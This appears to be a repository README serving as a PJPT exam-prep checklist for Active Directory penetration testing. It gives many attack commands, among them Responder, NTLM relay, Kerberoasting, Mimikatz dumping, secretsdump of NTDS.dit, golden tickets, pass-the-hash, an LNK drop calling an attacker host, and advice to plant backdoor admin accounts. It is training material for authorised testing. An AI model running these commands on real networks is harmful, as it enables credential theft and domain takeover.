This repository contains comprehensive guides for Practical Junior Penetration Tester (PJPT) preparation. Each document focuses on specific attack techniques commonly encountered in Active Directory penetration testing.
- Kerberoasting - Service account password extraction and cracking
- Token Impersonation - Post-exploitation privilege escalation via token stealing
- LNK File Attacks - Malicious shortcut file creation for credential theft
- GPP/cPassword Attacks - Group Policy Preferences credential extraction
- Mimikatz Overview - Comprehensive credential dumping and Kerberos attacks
- NTDS.dit Extraction - Active Directory database dumping and hash analysis
- Golden Ticket Attacks - Ultimate domain persistence via krbtgt compromise
- Recent AD Vulnerabilities - ZeroLogon, PrintNightmare, Sam the Admin
- Post-Compromise Attack Strategy - Systematic methodology for post-exploitation activities
- Post-Domain Compromise Strategy - What to do after achieving Domain Admin access
- Initial Internal Attack Strategy - First steps after gaining internal network access
- Domain Enumeration - Active Directory reconnaissance techniques
- SMB Relay Attacks - NTLM relay attack techniques
- LLMNR Poisoning - Link-Local Multicast Name Resolution attacks
- IPv6 Attacks - IPv6-based attack vectors
- Passback Attacks - Printer and device credential extraction
- Pass Attacks - Pass-the-Hash, Pass-the-Ticket, and related techniques
# ✅ Network Discovery
nmap -sC -sV -oA initial_scan target_range- LLMNR Poisoning -
responder -I eth0 -wrf - SMB Relay -
ntlmrelayx.py -tf targets.txt -smb2support - IPv6 Attacks -
mitm6 -d domain.local
- Passback Attacks - Target printers and IoT devices
- Password Spraying - Test common passwords against user lists
- Pass Attacks - Use any obtained credentials immediately
# ✅ Quick Assessment with any valid credentials
crackmapexec smb target_range -u username -p password --shares- Kerberoasting -
GetUserSPNs.py domain.local/user:pass -request - GPP/cPassword -
auxiliary/scanner/smb/smb_enum_gpp - Secretsdump -
secretsdump.py domain.local/user:pass@target - LNK File Attacks -
netexec smb target -M slinky
- Mimikatz -
privilege::debug→sekurlsa::logonpasswords - Token Impersonation -
load incognito→list_tokens -u - Hash Cracking -
hashcat -m 13100 hashes.txt rockyou.txt
# ✅ Comprehensive Domain Analysis
bloodhound-python -d domain.local -u user -p pass -gc dc.domain.local -c all- Domain Enumeration - Comprehensive AD reconnaissance
- BloodHound Analysis - Privilege escalation path identification
- Service Enumeration - SQL, Exchange, file servers, etc.
- Recent AD Vulnerabilities -
crackmapexec smb range -M zerologon
- Delegation Attacks - Constrained/Unconstrained delegation abuse
- Certificate Attacks - AD CS vulnerabilities (if present)
- Backup System Targeting - Often contain high-privilege credentials
- Application-Specific Attacks - SQL injection, web app vulnerabilities
# ✅ Systematic Lateral Movement
crackmapexec smb target_range -u admin -H hash --pwn3d- Pass-the-Hash -
psexec.py -hashes :hash admin@target - Pass-the-Ticket -
kerberos::ptt ticket.kirbi - Golden/Silver Tickets -
kerberos::goldenfor persistence - WMI/WinRM - Alternative execution methods
- Backdoor Accounts - Create domain admin accounts for persistence
- Data Extraction - Identify and document sensitive data access
- Service Disruption Testing - Demonstrate impact potential
- Complete Domain Compromise - NTDS.dit extraction if possible
# ✅ Maximum Value Demonstration
secretsdump.py domain/admin@dc.target.local -ntdsPost-Domain Compromise Strategy - Complete Value Demonstration
- NTDS.dit Extraction -
secretsdump.py domain/admin@dc -just-dc-ntlm - Password Cracking Analysis -
hashcat -m 1000 ntds_hashes.txt rockyou.txt - Golden Ticket Creation -
mimikatz "kerberos::golden /krbtgt:HASH" - Sensitive Data Discovery - Enumerate shares for confidential information
- Persistence Establishment - Golden tickets and backdoor accounts
- Business Impact Documentation - Quantify the compromise impact
- Attack Chain Validation - Test alternative compromise methods
- Professional Cleanup - Document and remove all persistence mechanisms
# Kerberoasting
GetUserSPNs.py domain.local/user:pass -dc-ip DC_IP -request
# GPP Password Extraction
auxiliary/scanner/smb/smb_enum_gpp
# Credential Testing
crackmapexec smb target_range -u user -p pass --shares
# Token Impersonation
load incognito; list_tokens -u; impersonate_token DOMAIN\\admin
# LNK File Deployment
netexec smb target -d domain -u user -p pass -M slinky -o NAME=doc SERVER=attacker_ip
# Mimikatz Credential Dump
privilege::debug; sekurlsa::logonpasswords
# BloodHound Data Collection
bloodhound-python -d domain.local -u user -p pass -gc dc.domain.local -c all
# Pass-the-Hash
psexec.py -hashes :ntlm_hash admin@target_ip# Kerberos TGS-REP (Kerberoasting)
hashcat -m 13100 kerberoast_hashes.txt rockyou.txt
# NetNTLMv2 (from Responder)
hashcat -m 5600 netntlmv2_hashes.txt rockyou.txt
# NTLM (from secretsdump)
hashcat -m 1000 ntlm_hashes.txt rockyou.txt- Hour 1: Network discovery and initial access attempts
- Hour 2: Post-compromise quick wins and immediate credential gathering
- Hour 3-4: Deep enumeration and privilege escalation
- Hour 5-6: Lateral movement, persistence, and documentation
- Clear Attack Chain - Document step-by-step progression from initial access to domain admin
- Command Evidence - Include exact commands used and their outputs
- Impact Assessment - Demonstrate business impact of compromise
- Remediation Recommendations - Provide specific mitigation strategies
- Timeline - Show progression and persistence of access
- Don't Skip Quick Wins - Always try Kerberoasting and GPP attacks first
- Don't Forget Token Impersonation - Check for high-value tokens after gaining admin access
- Don't Overlook Legacy Systems - Older systems often have exploitable vulnerabilities
- Don't Rush Documentation - Take screenshots and notes throughout the process
- Don't Ignore Lateral Movement - Demonstrate access to multiple systems
- LLMNR Poisoning → Pass-the-Hash → Token Impersonation → Domain Admin
- Password Spraying → Kerberoasting → Lateral Movement → Mimikatz → Golden Ticket
- LNK File Attack → Credential Capture → GPP Enumeration → Service Account Compromise
- Responder captures initial credentials
- CrackMapExec tests credential validity and finds admin access
- Impacket tools perform targeted attacks (secretsdump, GetUserSPNs)
- Metasploit provides automated enumeration (GPP, SMB enumeration)
- Mimikatz extracts additional credentials from memory
- BloodHound maps privilege escalation paths
- Manual techniques fill gaps where automated tools fail
This checklist represents a systematic approach to Active Directory penetration testing aligned with PJPT examination requirements. Each technique builds upon the previous ones, creating a comprehensive attack methodology.
Remember: The goal is not just to achieve domain admin access, but to demonstrate a thorough understanding of the attack chain, document findings professionally, and provide actionable remediation advice.
Practice Environment: Test all techniques in a lab environment before the exam. Tools and commands may behave differently across various Windows versions and domain configurations.
Time Management: Stick to the time allocations suggested above. It's better to have partial access with good documentation than complete access with poor documentation.
Good luck with your PJPT examination! 🚀